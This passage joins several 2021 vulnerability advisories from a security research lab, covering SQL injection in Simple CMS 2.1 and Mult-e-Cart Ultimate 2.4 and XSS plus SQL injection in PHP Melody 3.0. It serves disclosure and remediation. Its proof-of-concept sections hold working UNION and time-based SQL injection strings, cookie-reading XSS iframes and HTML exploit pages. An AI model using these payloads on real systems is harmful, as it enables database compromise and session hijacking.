edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection
# Date: 2021-10-19
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://simplephpscripts.com/simple-cms-php
# Version: 2.1
# Tested on: Linux
Document Title:
===============
Simplephpscripts Simple CMS v2.1 - SQL Injection
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2303
Release Date:
=============
2021-10-19
Vulnerability Laboratory ID (VL-ID):
====================================
2303
Common Vulnerability Scoring System:
====================================
7.1
Vulnerability Class:
====================
SQL Injection
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
The system could be used only in already existing websites to control their page sections and contents.
Just paste a single line of code on your web page section and start controlling it through the admin area.
Very simple installation - one step installation wizard. Option to include contents into web page sections
through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and
format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.
(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.
Affected Product(s):
====================
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A remote sql-injection vulnerability has been discovered in the official creative zone web-application.
The vulnerability allows remote attackers to inject or execute own sql commands to compromise the dbms
or file system of the application.
The sql-injection web vulnerability is located in the `newUser` and `editUser` function of the `users` module in
the `admin.php` file. Remote attackers with privileged access to the panel are able to add users. If a user account
already exists like for example the admin account, each add of the same name or email values results in a unfiltered
mysql exception. The exception is not filtered and sanitized. Thus allows privileged attackers to inject and execute
own sql commands on the affected database management system to compromise. The request method to inject is post and
the attack vector is non-persistent.
Exploitation of the sql injection vulnerability requires user interaction and a privileged web-application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] newUser
[+] editUser
Vulnerable File(s):
[+] admin.php?act=users
Vulnerable Input(s):
[+] Name
[+] Username
[+] Password
Vulnerable Parameter(s):
[+] name
[+] username
[+] password
Affected Module(s):
[+] Users (act=users) (Backend)
Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by remote attackers with privileged account and without user interaction.
For security demonstration or to reproduce the sql injection vulnerability follow the provided information and steps below to continue.
PoC: Example
act=addUser&name=[ADD EXISITING DEFAULT VALUE!]&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE!]&password=[ADD EXISITING DEFAULT VALUE!]&submit=Add User
PoC: Exploitation
act=addUser&name=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&password=a-1'&submit=Add User
--- PoC Session Logs (POST) ---
https://simple-cms.localhost:8000/simplecms/admin.php
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
Origin: https://simple-cms.localhost:8000
Connection: keep-alive
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
act=addUser&name=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&password=[ADD EXISITING DEFAULT VALUE]-[SQL-INJECTION!]'&submit=Add User
-
POST: HTTP/2.0 200 OK
server: Apache
content-length: 1224
content-type: text/html; charset=UTF-8
--- SQL Error Exception Logs ---
Error: SELECT * FROM cms2_users WHERE username='a%20-1'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%20-1'' at line 1
Solution - Fix & Patch:
=======================
1. Disallow sql-errors to be displayed in the frontend and backend. Disable to redisplay the broken or malicious query on client-side.
2. Use prepared statement to protect the sql query of the post method request
3. Restrict the post parameters by disallow the usage of special chars with single or double quotes
4. Setup a filter or validation class to deny broken or manipulated sql queries
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
# Exploit Title: PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-10-20
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
# Version: v3
# Tested on: Linux
Document Title:
===============
PHP Melody v3.0 - Multiple Cross Site Web Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2290
Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
Release Date:
=============
2021-10-20
Vulnerability Laboratory ID (VL-ID):
====================================
2290
Common Vulnerability Scoring System:
====================================
5
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple non-persistent cross site scripting vulnerabilities in the PHP Melody v3.0 video cms web-application.
Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Pre Auth (No Privileges or Session)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple non-persistent cross site web vulnerabilities has been discovered in the official PHP Melody v3.0 video cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser
to web-application requests by the client-side.
The cross site scripting vulnerabilities are located in the `moved`, `username` and `keyword` parameters of the `categories.php`, `import.php`
or `import-user.php` files. The injection point is located in the get method request and the execution occurs with non-persistent attack vector
in the status message or exception of the admin panel ui.
Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
to malicious source and non-persistent manipulation of affected application modules.
Request Method(s):
[+] GET
Vulnerable File(s):
[+] categories.php
[+] import-user.php
[+] import.php
Vulnerable Parameter(s):
[+] move
[+] username
[+] keyword
Affected Module(s):
[+] Status Message & Exception
Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.
PoC: Payload
%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E
PoC: Exploitation
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E
-
https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E
&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
-
https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4
PoC: Exploit
<html>
<head><body>
<title>PHP Melody v3.0 - XSS PoC Exploit</title>
#1
<iframe src="https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E" width="200" height="200"> </iframe>
#2
<iframe src="https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E" width="200" height="200">
&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1 </iframe>
#3
<iframe src="https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E" width="200" height="200">&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4 </iframe>
</body></head>
</html>
--- PoC Session Logs (GET) (move) ---
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved="><iframe src=evil.source onload=alert(document.cookie)>
Host: phpmelody.localhost.com:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u;
melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy;
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.4.34
--- PoC Session Logs (GET) (username) ---
https://phpmelody.localhost:8080/admin/import-user.php?action=search&username="><iframe src=evil.source onload=alert(document.cookie)>&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
Host: phpmelody.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u;
melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy;
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.4.34
Vulnerable Source: Categories.php (type=genre&id=1&moved)
<div class="alert alert-success alert-styled-left"><button type="button" class="close" data-dismiss="alert"
aria-label="Close"><span aria-hidden="true">×</span></button>
Category<strong>Film & animation</strong> moved "><iframe src="evil.source" onload="alert(document.cookie)"> a level.</div>
<div id="display_result" style="display:none;"></div>
Vulnerable Source: Import Videos from User (action=search&username)
<div class="card">
<div class="card-body">
<h5 class="mb-3">Username</h5>
<div class="d-block">
<form name="import-user-search-form" id="import-user-search-form" action="" method="post" class="">
<div class="input-group mb-3">
<div class="form-group-feedback form-group-feedback-left">
<input name="username" type="text" class="form-control form-control-lg alpha-grey gautocomplete" value=""><iframe src="evil.source" onload="alert(document.cookie)">"
placeholder="Enter username or Channel ID" autocomplete="yt-username" />
<div class="form-control-feedback form-control-feedback-lg">
<i class="icon-search4 text-muted"></i>
</div></div>
<div class="input-group-append">
<select name="data_source" class="form-field alpha-grey custom-select custom-select-lg">
<option value="youtube" selected="selected">Youtube User</option>
<option value="youtube-channel" >Youtube Channel</option>
<option value="dailymotion" >Dailymotion User</option>
<option value="vimeo" >Vimeo User</option>
</select></div>
<div class="input-group-append">
<button type="submit" name="submit" class="btn btn-primary btn-lg" id="search-user-btn">Search</button>
</div></div>
Reference(s):
https://phpmelody.localhost.com:8080/admin/
https://phpmelody.localhost.com:8080/admin/import.php
https://phpmelody.localhost.com:8080/admin/categories.php
https://phpmelody.localhost.com:8080/admin/import-user.php
Solution - Fix & Patch:
=======================
The vulnerabilities can be resolved by the following steps ...
1. Encode, escape or filter the vulnerable move, keyword and username parameters in the get method requests
2. Restrict all the transmitted parameters by disallowing the usage of special chars
3. Sanitize the status message and error message output to prevent the execution points
4. Alternativ setup security headers and a web firewall or filter to prevent further exploitation
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
# Exploit Title: PHP Melody 3.0 - 'vid' SQL Injection
# Date: 2021-10-20
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
# Version: v3
Document Title:
===============
PHP Melody v3.0 - (vid) SQL Injection Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2295
Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/
Release Date:
=============
2021-10-20
Vulnerability Laboratory ID (VL-ID):
====================================
2295
Common Vulnerability Scoring System:
====================================
7
Vulnerability Class:
====================
SQL Injection
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.
(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the PHP Melody v3.0 video cms web-application.
Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Full Authentication (Admin/Root Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A remote sql-injection vulnerability has been discovered in the PHP Melody v3.0 video cms web-application.
The vulnerability allows remote attackers to inject or execute own sql commands to compromise the dbms or
file system of the web-application.
The remote sql injection vulnerability is located in the `vid` parameter of the `edit-video.php` file.
Remote attackers with moderator or admin access privileges are able to execute own malicious sql commands
by inject get method request. The vid parameter in the acp ui is not sanitized properly. Thus allows an
attacker to inject own sql commands to compromise the web-application and dbms.
Exploitation of the remote sql injection vulnerability requires no user interaction but a privileged moderator or admin account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Video Edit
Vulnerable File(s):
[+] edit-video.php
Vulnerable Parameter(s):
[+] vid
Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by authenticated remote attackers without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Original:
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd&a=4&page=1&filter=added&fv=desc
PoC: Exploitation #1
https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,
CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271),
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
PoC: Exploitation #2
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--
PoC: Exploit
<html>
<head><body>
<title>phpmelody vid sql injection poc</title>
<iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,
CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271),
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--">
<br>
<iframe src="https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND (SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--">
</body></head>
</html>
Reference(s):
https://phpmelody.localhost:8000/
https://phpmelody.localhost:8000/admin/
https://phpmelody.localhost:8000/admin/edit-video.php
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following steps ...
1. Use a prepared statement to build the query
2. Restrict the parameter input to disallow special chars
3. Escape and encode the content to prevent execution of malicious payloads
4. Alternativ it is possible to integrate a web firewall or filter class to block further attacks.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
# Exploit Title: Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection
# Date: 2021-10-22
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://multecart.com/
# Version: 2.4
Document Title:
===============
Mult-e-Cart Ultimate v2.4 - SQL Injection Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2306
Release Date:
=============
2021-10-22
Vulnerability Laboratory ID (VL-ID):
====================================
2306
Common Vulnerability Scoring System:
====================================
7
Vulnerability Class:
====================
SQL Injection
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Digital Multivendor Marketplace Online Store - eShop CMS
(Source: https://ultimate.multecart.com/ & https://www.techraft.in/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple sql-injection web vulnerabilities in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.
Affected Product(s):
====================
Techraft
Product: Digital Multivendor Marketplace Online Store v2.4 - eShop CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-10-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple classic sql-injection web vulnerabilities has been discovered in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.
The web vulnerability allows remote attackers to inject or execute own sql commands to compromise the database management system.
The vulnerabilities are located in the `id` parameter of the `view` and `update` function. The vulnerable modules are `inventory`,
`customer`, `vendor` and `order`. Remote attackers with a vendor shop account are able to exploit the vulnerable id parameter to
execute malicious sql commands. The request method to inject is get and the attack vector is located on the client-side. The remote
vulnerability is a classic order by sql-injection. The issue is exploitable with one of the two vendor roles or higher privileged
roles like admin.
Exploitation of the remote sql injection vulnerabilities requires no user interaction and a privileged vendor- or admin role user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] inventory/inventory/update
[+] /customer/customer/view
[+] /vendor/vendor/view
[+] /order/sub-order/view-order
Vulnerable Parameter(s):
[+] id
Proof of Concept (PoC):
=======================
The remote sql injection web vulnerabilities can be exploited by remote attackers with privileged backend panel access without user interaction.
For security demonstration or to reproduce the remote sql-injection web vulnerability follow the provided information and steps below to continue.
PoC: Payloads
1' union select 1,2,3,4,@@version--&edit=t
1' union select 1,2,3,4,@@database--&edit=t
PoC: Exploitation
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5
-
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5
PoC: Exploit
<html>
<head><body>
<title>Mult-E-Cart Ultimate - SQL Injection PoC</title>
<iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@database--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@database--" width="400" height="400"><br>
<br>
<iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 1,2,3,4,@@version--&edit=t" width="400" height="400"><br>
<iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,@@version--" width="400" height="400">
</body></head>
</html>
--- SQL Error Exception Handling Logs ---
SQLSTATE[42S22]: Column not found: 1054 Unknown column '100' in 'order clause'
The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=1 order by 100--
-
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1 in /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php:1299
-
Stack trace:
#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1299): PDOStatement->execute()
#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): yiidbCommand->internalExecute('SELECT * FROM `...')
#2 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): yiidbCommand->queryInternal('fetch', NULL)
#3 /home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yiidbCommand->queryOne()
#4 /home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yiidbQuery->one(NULL)
#5 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): yiidbActiveQuery->one()
#6 /home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): multebackmodulesinventorycontrollersInventoryController->findModel('-1'')
#7 [internal function]: multebackmodulesinventorycontrollersInventoryController->actionUpdate('-1'')
#8 /home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, Array)
#9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): yiibaseInlineAction->runWithParams(Array)
#10 /home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): yiibaseController->runAction('update', Array)
#11 /home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): yiibaseModule->runAction('inventory/inven...', Array)
#12 /home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): yiiwebApplication->handleRequest(Object(yiiwebRequest))
#13 /home/test/MulteCartUltimate/multeback/web/index.php(153): yiibaseApplication->run()
#14 {main}
-
Next yiidbException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=-1' in /home/test/MulteCart/vendor/yiisoft/yii2/db/Schema.php:678
-
Stack trace:
